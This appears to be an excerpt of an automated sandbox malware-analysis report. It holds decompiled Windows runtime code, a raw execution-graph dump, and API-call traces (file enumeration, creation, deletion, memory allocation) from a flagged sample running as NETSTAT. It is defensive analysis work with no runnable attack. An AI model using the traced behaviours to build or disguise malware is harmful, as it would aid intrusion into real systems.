                                          • Instruction Fuzzy Hash: 8B416BB16047169FC311DF28C485A1BBBE9BF88718F04452EF988DB341D731EA45CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E0138FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E0133CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E01385720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E01385720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}











                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0138FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0138FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0138FE01
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 9e36ce87c67b1538051b1e63566c8e22a3eceb236215346a2d75439fe35667f4
                                          • Instruction ID: bb916078191aab3449a36717cb6ac585adae7b148b9be1869cc6c0a1cf778a16
                                          • Opcode Fuzzy Hash: 9e36ce87c67b1538051b1e63566c8e22a3eceb236215346a2d75439fe35667f4
                                          • Instruction Fuzzy Hash: 56F0F632200201BFEA202B5ADC06F23BF5EEB44B34F144319F628565D1EA62F87087F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:8.2%
                                          Dynamic/Decrypted Code Coverage:1.3%
                                          Signature Coverage:2%
                                          Total number of Nodes:1214
                                          Total number of Limit Nodes:135
34182->34183 34184 bcd9bb 34183->34184 34185 bd2dd0 34184->34185 34186 bd2df2 34185->34186 34187 bcaf40 LdrLoadDll 34186->34187 34188 bd2fbd 34187->34188 34189 bcaf40 LdrLoadDll 34188->34189 34190 bd2fce 34189->34190 34191 bcae10 LdrLoadDll 34190->34191 34192 bd2fe5 34191->34192 34489 bd2ca0 34192->34489 34195 bd2ca0 13 API calls 34196 bd305b 34195->34196 34197 bd2ca0 13 API calls 34196->34197 34198 bd3073 34197->34198 34199 bd2ca0 13 API calls 34198->34199 34200 bd308b 34199->34200 34201 bd2ca0 13 API calls 34200->34201 34202 bd30a3 34201->34202 34203 bd2ca0 13 API calls 34202->34203 34204 bd30be 34203->34204 34205 bd30d8 34204->34205 34206 bd2ca0 13 API calls 34204->34206 34205->34034 34207 bd310c 34206->34207 34208 bd2ca0 13 API calls 34207->34208 34209 bd3149 34208->34209 34210 bd2ca0 13 API calls 34209->34210 34211 bd3186 34210->34211 34212 bd2ca0 13 API calls 34211->34212 34213 bd31c3 34212->34213 34214 bd2ca0 13 API calls 34213->34214 34215 bd3200 34214->34215 34215->34034 34217 bd58dd 34216->34217 34218 bcabf0 LdrLoadDll 34217->34218 34219 bd58f8 34218->34219 34220 bd7360 LdrLoadDll 34219->34220 34239 bd5ac6 34219->34239 34221 bd5922 34220->34221 34222 bd7360 LdrLoadDll 34221->34222 34223 bd5935 34222->34223 34224 bd7360 LdrLoadDll 34223->34224 34225 bd5948 34224->34225 34226 bd7360 LdrLoadDll 34225->34226 34227 bd595b 34226->34227 34228 bd7360 LdrLoadDll 34227->34228 34229 bd5971 34228->34229 34230 bd7360 LdrLoadDll 34229->34230 34231 bd5984 34230->34231 34232 bd7360 LdrLoadDll 34231->34232 34233 bd5997 34232->34233 34234 bd7360 LdrLoadDll 34233->34234 34235 bd59aa 34234->34235 34236 bd7360 LdrLoadDll 34235->34236 34237 bd59bf 34236->34237 34238 bd5ba0 10 API calls 34237->34238 34237->34239 34241 bd5a41 34238->34241 34239->34036 34241->34239 34504 bd5480 LdrLoadDll 34241->34504 34243 bcfa6b 34242->34243 34244 bcfa60 34242->34244 34505 bce760 34243->34505 34245 bde400 2 API calls 34244->34245 34245->34243 34247 bcfa7a 34248 bcfa81 34247->34248 34250 bcfaa0 
34247->34250 34514 bcf7f0 34247->34514 34248->34038 34251 bcfab8 34250->34251 34252 bde320 2 API calls 34250->34252 34251->34038 34252->34251 34533 bd0820 34253->34533 34255 bd0aad 34556 bd0500 34255->34556 34257 bcd9f1 34257->33914 34259 bcc79c 34258->34259 34260 bdc5f0 LdrLoadDll 34259->34260 34261 bcc7b5 34260->34261 34262 bcc7bc 34261->34262 34281 bdc630 34261->34281 34262->34072 34266 bcc7f7 34267 bdc8a0 2 API calls 34266->34267 34268 bcc81a 34267->34268 34268->34072 34270 bcc855 34269->34270 34290 bdc4a0 34270->34290 34273 bd5ba0 34274 bd5c1d 34273->34274 34275 bd6f50 10 API calls 34274->34275 34276 bd5d99 34274->34276 34275->34276 34276->34081 34277->34079 34278->34087 34279->34094 34280->34100 34282 bdd3e0 LdrLoadDll 34281->34282 34283 bdc64c 34282->34283 34289 35d9710 LdrInitializeThunk 34283->34289 34284 bcc7df 34284->34262 34286 bdcc20 34284->34286 34287 bdd3e0 LdrLoadDll 34286->34287 34288 bdcc3f 34287->34288 34288->34266 34289->34284 34291 bdd3e0 LdrLoadDll 34290->34291 34292 bdc4bc 34291->34292 34295 35d96d0 LdrInitializeThunk 34292->34295 34293 bcc8c9 34293->34079 34293->34273 34295->34293 34297 bd4e5c 34296->34297 34298 bcabf0 LdrLoadDll 34297->34298 34299 bd4e77 34298->34299 34300 bd4e80 34299->34300 34301 bd7360 LdrLoadDll 34299->34301 34300->34121 34302 bd4e97 34301->34302 34303 bd7360 LdrLoadDll 34302->34303 34304 bd4eac 34303->34304 34305 bd7360 LdrLoadDll 34304->34305 34306 bd4ebf 34305->34306 34307 bd7360 LdrLoadDll 34306->34307 34308 bd4ed2 34307->34308 34309 bd7360 LdrLoadDll 34308->34309 34310 bd4ee8 34309->34310 34311 bd7360 LdrLoadDll 34310->34311 34312 bd4efb 34311->34312 34313 bcabf0 LdrLoadDll 34312->34313 34314 bd4f24 34313->34314 34315 bd7360 LdrLoadDll 34314->34315 34323 bd4fc0 34314->34323 34316 bd4f48 34315->34316 34317 bcabf0 LdrLoadDll 34316->34317 34318 bd4f7d 34317->34318 34319 bd7360 LdrLoadDll 34318->34319 34318->34323 34320 bd4f9a 34319->34320 34321 bd7360 LdrLoadDll 34320->34321 34322 bd4fad 34321->34322 34322->34323 
34324 bd7360 LdrLoadDll 34322->34324 34323->34121 34324->34323 34326 bd4d95 34325->34326 34326->34130 34328 bdd3e0 LdrLoadDll 34327->34328 34329 bdc5cc 34328->34329 34333 35d9610 LdrInitializeThunk 34329->34333 34330 bdc5eb 34330->34137 34332->34137 34333->34330 34335 bd13c8 34334->34335 34336 bcaf40 LdrLoadDll 34335->34336 34337 bd1466 34336->34337 34338 bcaf40 LdrLoadDll 34337->34338 34339 bd1481 34338->34339 34340 bcc830 2 API calls 34339->34340 34341 bd14a6 34340->34341 34342 bd15ed 34341->34342 34386 bdc530 34341->34386 34344 bd15fe 34342->34344 34374 bd0cf0 34342->34374 34344->34146 34347 bd15e3 34348 bdc8a0 2 API calls 34347->34348 34348->34342 34349 bd14df 34350 bdc8a0 2 API calls 34349->34350 34351 bd1519 34350->34351 34391 bde4d0 LdrLoadDll 34351->34391 34353 bd154f 34353->34344 34354 bcc830 2 API calls 34353->34354 34355 bd1575 34354->34355 34355->34344 34356 bdc530 2 API calls 34355->34356 34357 bd159a 34356->34357 34358 bd15cd 34357->34358 34359 bd15a1 34357->34359 34361 bdc8a0 2 API calls 34358->34361 34360 bdc8a0 2 API calls 34359->34360 34362 bd15ab 34360->34362 34363 bd15d7 34361->34363 34362->34146 34363->34146 34364->34150 34365->34147 34366->34153 34367->34149 34368->34156 34369->34164 34370->34159 34371->34165 34372->34160 34373->34163 34375 bd0d15 34374->34375 34376 bcaf40 LdrLoadDll 34375->34376 34377 bd0dd0 34376->34377 34378 bcaf40 LdrLoadDll 34377->34378 34379 bd0df4 34378->34379 34380 bd6f50 10 API calls 34379->34380 34382 bd0e47 34380->34382 34381 bd0f01 34381->34344 34382->34381 34383 bcaf40 LdrLoadDll 34382->34383 34384 bd0eae 34383->34384 34385 bd6f50 10 API calls 34384->34385 34385->34381 34387 bdd3e0 LdrLoadDll 34386->34387 34388 bdc54c 34387->34388 34392 35d9650 LdrInitializeThunk 34388->34392 34389 bd14d4 34389->34347 34389->34349 34391->34353 34392->34389 34394 bce31f 34393->34394 34395 bd7360 LdrLoadDll 34393->34395 34396 bce331 34394->34396 34397 bce326 GetFileAttributesW 34394->34397 34395->34394 34396->34179 34397->34396 
34399 bce355 34398->34399 34407 bce6f2 34398->34407 34400 bd6f50 10 API calls 34399->34400 34399->34407 34401 bce67d 34400->34401 34402 bd6f50 10 API calls 34401->34402 34401->34407 34403 bce6b1 34402->34403 34404 bce6c3 34403->34404 34405 bce702 34403->34405 34403->34407 34406 bd6f50 10 API calls 34404->34406 34405->34407 34408 bd6f50 10 API calls 34405->34408 34406->34407 34407->34179 34408->34407 34412 bd3dd6 34409->34412 34433 bdabb0 34409->34433 34411 bd3e2b 34411->34179 34412->34411 34413 bd3df5 34412->34413 34414 bd3e37 34412->34414 34415 bd3dfd 34413->34415 34416 bd3e1a 34413->34416 34417 bcaf40 LdrLoadDll 34414->34417 34418 bde320 2 API calls 34415->34418 34419 bde320 2 API calls 34416->34419 34420 bd3e48 34417->34420 34421 bd3e0e 34418->34421 34419->34411 34422 bd6f50 10 API calls 34420->34422 34421->34179 34423 bd3e5f 34422->34423 34473 bd3210 34423->34473 34425 bd3e6a 34429 bd3f68 34425->34429 34430 bd3e82 34425->34430 34426 bd3f4f 34427 bde320 2 API calls 34426->34427 34428 bd4073 34427->34428 34428->34179 34429->34426 34484 bd37a0 11 API calls 34429->34484 34430->34426 34483 bd37a0 11 API calls 34430->34483 34434 bdabbe 34433->34434 34435 bdabc5 34433->34435 34434->34412 34436 bcabf0 LdrLoadDll 34435->34436 34437 bdabf7 34436->34437 34438 bdac06 34437->34438 34485 bda6a0 LdrLoadDll 34437->34485 34439 bde400 2 API calls 34438->34439 34467 bdadbf 34438->34467 34441 bdac1f 34439->34441 34442 bdad6e 34441->34442 34443 bdac34 34441->34443 34441->34467 34444 bdad78 34442->34444 34445 bdae11 34442->34445 34486 bd32f0 LdrLoadDll 34443->34486 34487 bd32f0 LdrLoadDll 34444->34487 34448 bde320 2 API calls 34445->34448 34448->34467 34449 bdac4b 34451 bd7360 LdrLoadDll 34449->34451 34450 bdad8f 34488 bda030 LdrLoadDll 34450->34488 34453 bdac61 34451->34453 34455 bd7360 LdrLoadDll 34453->34455 34454 bdada5 34458 bd7360 LdrLoadDll 34454->34458 34456 bdac77 34455->34456 34457 bd7360 LdrLoadDll 34456->34457 34459 bdac8d 34457->34459 34458->34467 34460 bd7360 
LdrLoadDll 34459->34460 34461 bdaca6 34460->34461 34462 bd7360 LdrLoadDll 34461->34462 34463 bdacbc 34462->34463 34464 bd7360 LdrLoadDll 34463->34464 34465 bdacd2 34464->34465 34466 bd7360 LdrLoadDll 34465->34466 34468 bdace8 34466->34468 34467->34412 34469 bd7360 LdrLoadDll 34468->34469 34470 bdad0e 34469->34470 34470->34467 34471 bde320 2 API calls 34470->34471 34472 bdad62 34471->34472 34472->34412 34474 bd6f50 10 API calls 34473->34474 34475 bd3226 34474->34475 34476 bd3233 34475->34476 34477 bd6f50 10 API calls 34475->34477 34476->34425 34478 bd3244 34477->34478 34478->34476 34479 bd6f50 10 API calls 34478->34479 34480 bd325f 34479->34480 34481 bde320 2 API calls 34480->34481 34482 bd326c 34481->34482 34482->34425 34483->34430 34484->34429 34485->34438 34486->34449 34487->34450 34488->34454 34490 bd2cc9 34489->34490 34491 bd7360 LdrLoadDll 34490->34491 34492 bd2d00 34491->34492 34493 bd7360 LdrLoadDll 34492->34493 34494 bd2d18 34493->34494 34495 bd7360 LdrLoadDll 34494->34495 34497 bd2d34 34495->34497 34496 bd2dbc 34496->34195 34497->34496 34498 bd2d5e FindFirstFileW 34497->34498 34498->34496 34502 bd2d79 34498->34502 34499 bd2da3 FindNextFileW 34501 bd2db5 FindClose 34499->34501 34499->34502 34501->34496 34502->34499 34503 bd2b80 13 API calls 34502->34503 34503->34502 34504->34241 34506 bce778 34505->34506 34507 bce780 34505->34507 34506->34247 34508 bdabb0 3 API calls 34507->34508 34509 bce793 34508->34509 34509->34506 34510 bcaf40 LdrLoadDll 34509->34510 34511 bce81d 34510->34511 34512 bcaf40 LdrLoadDll 34511->34512 34513 bce82e 34512->34513 34513->34247 34515 bcf817 34514->34515 34516 bd7360 LdrLoadDll 34515->34516 34517 bcf8c6 34516->34517 34518 bcfa3f 34517->34518 34519 bcf8d1 GetFileAttributesW 34517->34519 34518->34247 34519->34518 34520 bcf8e3 34519->34520 34520->34518 34521 bce340 10 API calls 34520->34521 34523 bcaf40 LdrLoadDll 34520->34523 34524 bd3210 10 API calls 34520->34524 34527 bdaa50 34520->34527 34531 bda8e0 11 API calls 34520->34531 34532 
bda780 11 API calls 34520->34532 34521->34520 34523->34520 34524->34520 34528 bdaa66 34527->34528 34530 bdab66 34527->34530 34529 bd6f50 10 API calls 34528->34529 34528->34530 34529->34528 34530->34520 34531->34520 34532->34520 34534 bd0845 34533->34534 34535 bcaf40 LdrLoadDll 34534->34535 34536 bd08aa 34535->34536 34537 bcaf40 LdrLoadDll 34536->34537 34538 bd08f8 34537->34538 34539 bce300 2 API calls 34538->34539 34540 bd093f 34539->34540 34541 bd0946 34540->34541 34542 bdabb0 3 API calls 34540->34542 34541->34255 34544 bd0954 34542->34544 34543 bd095d 34543->34255 34544->34543 34545 bcaf40 LdrLoadDll 34544->34545 34548 bd09ac 34545->34548 34546 bce340 10 API calls 34546->34548 34547 bdaa50 10 API calls 34547->34548 34548->34546 34548->34547 34550 bd0a31 34548->34550 34572 bcff60 34548->34572 34551 bce340 10 API calls 34550->34551 34553 bd0a89 34550->34553 34583 bd02c0 34550->34583 34551->34550 34554 bde320 2 API calls 34553->34554 34555 bd0a90 34554->34555 34555->34255 34557 bd0521 34556->34557 34558 bd0516 34556->34558 34560 bce760 3 API calls 34557->34560 34559 bde400 2 API calls 34558->34559 34559->34557 34570 bd0530 34560->34570 34561 bd0537 34561->34257 34562 bce300 2 API calls 34562->34570 34563 bd07f0 34564 bd0809 34563->34564 34565 bde320 2 API calls 34563->34565 34564->34257 34565->34564 34566 bce340 10 API calls 34566->34570 34567 bdaa50 10 API calls 34567->34570 34568 bcaf40 LdrLoadDll 34568->34570 34569 bcff60 11 API calls 34569->34570 34570->34561 34570->34562 34570->34563 34570->34566 34570->34567 34570->34568 34570->34569 34571 bd02c0 10 API calls 34570->34571 34571->34570 34573 bcff86 34572->34573 34574 bd6f50 10 API calls 34573->34574 34575 bcffe2 34574->34575 34576 bd3210 10 API calls 34575->34576 34577 bcffed 34576->34577 34579 bd0170 34577->34579 34581 bd000b 34577->34581 34578 bd0155 34578->34548 34579->34578 34580 bcfe30 11 API calls 34579->34580 34580->34579 34581->34578 34589 bcfe30 34581->34589 34584 bd02e6 34583->34584 34585 bd6f50 10 
API calls 34584->34585 34586 bd0357 34585->34586 34587 bd3210 10 API calls 34586->34587 34588 bd0362 34587->34588 34588->34550 34590 bcfe46 34589->34590 34593 bd3680 34590->34593 34592 bcff4e 34592->34581 34594 bd36bd 34593->34594 34595 bd376d 34594->34595 34596 bd4660 11 API calls 34594->34596 34597 bd3710 34594->34597 34595->34592 34596->34597 34598 bd3749 34597->34598 34599 bde320 LdrLoadDll RtlFreeHeap 34597->34599 34598->34592 34599->34598 34600->34046 34601->34057 34602->34055 34603->34049 34604 bc7af0 34605 bc7b15 34604->34605 34606 bdc120 LdrLoadDll 34605->34606 34607 bc7b5f 34606->34607 34608 bc7b69 34607->34608 34609 bc7bea 34607->34609 34610 bdc310 2 API calls 34607->34610 34650 bce030 LdrLoadDll NtClose 34609->34650 34611 bc7b8d 34610->34611 34611->34609 34613 bc7b98 34611->34613 34615 bc7c16 34613->34615 34637 bcbd40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34613->34637 34614 bc7c05 34616 bc7c0c 34614->34616 34617 bc7c22 34614->34617 34619 bdc8a0 2 API calls 34616->34619 34651 bdc1a0 LdrLoadDll 34617->34651 34619->34615 34620 bc7bb2 34620->34615 34638 bc7920 34620->34638 34622 bc7c4d 34652 bcbd40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34622->34652 34626 bc7c6d 34626->34615 34653 bdc1d0 LdrLoadDll 34626->34653 34628 bc7c92 34654 bdc260 LdrLoadDll 34628->34654 34630 bc7cac 34655 bdc230 LdrLoadDll 34630->34655 34632 bc7cbb 34633 bdc8a0 2 API calls 34632->34633 34634 bc7cc5 34633->34634 34656 bc76f0 13 API calls 34634->34656 34636 bc7cd9 34637->34620 34639 bc7936 34638->34639 34657 bdbc40 34639->34657 34641 bc7ac1 34642 bc794f 34642->34641 34678 bc7500 10 API calls 34642->34678 34644 bc7a35 34644->34641 34679 bc76f0 13 API calls 34644->34679 34646 bc7a63 34646->34641 34647 bdc310 2 API calls 34646->34647 34648 bc7a98 34647->34648 34648->34641 34680 bdc910 LdrLoadDll 34648->34680 34650->34614 34651->34622 34652->34626 34653->34628 34654->34630 34655->34632 34656->34636 34658 bde400 2 API calls 34657->34658 34659 bdbc57 
34658->34659 34681 bc9250 34659->34681 34661 bdbc72 34662 bdbca7 34661->34662 34663 bdbc93 34661->34663 34666 bde2a0 2 API calls 34662->34666 34664 bde320 2 API calls 34663->34664 34665 bdbc9d 34664->34665 34665->34642 34667 bdbd0e 34666->34667 34668 bde2a0 2 API calls 34667->34668 34669 bdbd27 34668->34669 34673 bdbff2 34669->34673 34687 bde2e0 LdrLoadDll 34669->34687 34671 bdbfd7 34672 bdbfde 34671->34672 34671->34673 34674 bde320 2 API calls 34672->34674 34676 bde320 2 API calls 34673->34676 34675 bdbfe8 34674->34675 34675->34642 34677 bdc047 34676->34677 34677->34642 34678->34644 34679->34646 34680->34641 34682 bc9275 34681->34682 34683 bcabf0 LdrLoadDll 34682->34683 34684 bc92a8 34683->34684 34685 bcc770 3 API calls 34684->34685 34686 bc92cd 34684->34686 34685->34686 34686->34661 34687->34671 34688 35d9540 LdrInitializeThunk 34690 bdb440 34691 bde2a0 2 API calls 34690->34691 34693 bdb47b 34690->34693 34691->34693 34692 bdb576 34693->34692 34694 bcabf0 LdrLoadDll 34693->34694 34695 bdb4bb 34694->34695 34696 bd7360 LdrLoadDll 34695->34696 34698 bdb4da 34696->34698 34697 bdb4f0 Sleep 34697->34698 34698->34692 34698->34697 34701 bdb0b0 LdrLoadDll 34698->34701 34702 bdb290 LdrLoadDll 34698->34702 34701->34698 34702->34698
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 00BD2D6F
                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 00BD2DAE
                                          • FindClose.KERNELBASE(?), ref: 00BD2DB9
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: cc032a7772c4140533036cf3b1a79082cead9a9b4a02419c26da5f70b1f6b180
                                          • Instruction ID: b0a7e6c54dd9bceb8f0184ef2dc61b2e17916ab29cc40d1659064396ee91f3ac
                                          • Opcode Fuzzy Hash: cc032a7772c4140533036cf3b1a79082cead9a9b4a02419c26da5f70b1f6b180
                                          • Instruction Fuzzy Hash: B43194719003486BDB20DF64CC85FEFB7BDEF54715F144499B909A7280F670AA84CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtDeleteFile.NTDLL(00BD7082,00000206,?,00BD7082,00000005,00000018,?,?,00000000,00000206,?), ref: 00BDC895
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 25d74192eeca7f9acee8072f72e44533445d5372083b4cd18595bce7331ba3e3
                                          • Instruction ID: 828736c1d4c0f7d824129bab9b4c65a0643b08a6ef6b4689bf356da1303cceb6
                                          • Opcode Fuzzy Hash: 25d74192eeca7f9acee8072f72e44533445d5372083b4cd18595bce7331ba3e3
                                          • Instruction Fuzzy Hash: F1016DB6240104AFDB10DF98DC85FEB7BA9EF88750F11865AFA1D97381D631E911CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,00BD70BC,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00BD70BC,00000000,00000005,00000060,00000000,00000000), ref: 00BDC7BD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: a078c3bf9d57d83358e91183a1e3254be38147f7c3a1d2eec9006c3564a7671c
                                          • Instruction ID: de3efba5e2582ee16b1fc3163c6cd0d92699373e88b70e4d22ca7a81f94b85b1
                                          • Opcode Fuzzy Hash: a078c3bf9d57d83358e91183a1e3254be38147f7c3a1d2eec9006c3564a7671c
                                          • Instruction Fuzzy Hash: 3601B6B2600108AFCB58CF98DC85EEB77E9EF8C754F118259BA0DD7241D630E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,00BD70BC,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00BD70BC,00000000,00000005,00000060,00000000,00000000), ref: 00BDC7BD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                          • Instruction ID: 80272f3aaa511cb6b8ce40d74d666ceabe217fb8b3def21cb321ec50ea2e8889
                                          • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                          • Instruction Fuzzy Hash: 2EF07FB2215208AFCB58DF99DC85EEB77EDAF8C754F118248BA0D97241D630F851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(00BD7280,00BD255C,FFFFFFFF,00BD6D6A,00000206,?,00BD7280,00000206,00BD6D6A,FFFFFFFF,00BD255C,00BD7280,00000206,00000000), ref: 00BDC865
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                          • Instruction ID: eaabaa48d647b938c118b959ecb2d187c63b4f2fed2a305c3bd645744ff6158b
                                          • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                          • Instruction Fuzzy Hash: A5F0AFB2200208ABCB14DF89DC85EEB77ADAF8C754F118249BA4DA7241D630E811CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BC2D11,00002000,00003000,00000004), ref: 00BDC989
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 5963d8c5123dac3d58657db6fefd9ffd8b71426ea0f2c56084ddf82e0e0f09d0
                                          • Instruction ID: 398cb52d860de784de715d6efad27d57dd054a9bb0290666c22fe83a7a550779
                                          • Opcode Fuzzy Hash: 5963d8c5123dac3d58657db6fefd9ffd8b71426ea0f2c56084ddf82e0e0f09d0
                                          • Instruction Fuzzy Hash: 69F01CB5200158AFCB14DFA9DC81EEB7BADAF8D350F158249FE4997242C630E811CBB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BC2D11,00002000,00003000,00000004), ref: 00BDC989
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                          • Instruction ID: ddcfc7cacb532f92dba35089e6bedfd26b86b7e98af04349a9228df3e0154957
                                          • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                          • Instruction Fuzzy Hash: 45F015B2200208ABCB18DF89DC81EAB77ADAF88750F018249BE0997241C630F810CBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00BD725E,00000206,?,00BD725E,00000005,FFFFFFFF), ref: 00BDC8C5
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                          • Instruction ID: c757b5a69c8c58a16cbc441d03d71ea4f9bcd38547dc66e5c33e64a488f3f46f
                                          • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                          • Instruction Fuzzy Hash: 9DD01772240214ABD614EBA8DC89E9B7BACDF48660F014195BA4D5B282D630FA008AE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtDeleteFile.NTDLL(00BD7082,00000206,?,00BD7082,00000005,00000018,?,?,00000000,00000206,?), ref: 00BDC895
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
